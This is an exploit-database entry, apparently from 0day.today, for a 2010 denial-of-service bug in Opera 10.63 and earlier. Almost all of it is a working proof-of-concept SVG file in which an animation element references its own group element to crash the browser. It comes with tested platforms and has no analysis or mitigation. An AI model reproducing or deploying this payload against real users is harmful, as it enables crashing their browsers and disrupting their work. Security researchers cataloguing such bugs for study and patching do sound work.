id: 14510
date: 10/18/2010
title: Opera v10.63 SVG animation Element Denial of Service
author: n/a
cves: 

====================================================
Opera v10.63 SVG animation Element Denial of Service 
====================================================

# Software Link: http://www.opera.com/
# Version: 10.63 and previous
# Tested on: Ubuntu 10.10 x64, Windows 7 x64
 
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" >
<g id="animTest" ></g>
<animation xlink:href="#animTest" />
</svg>



#  0day.today [2023-03-24]  #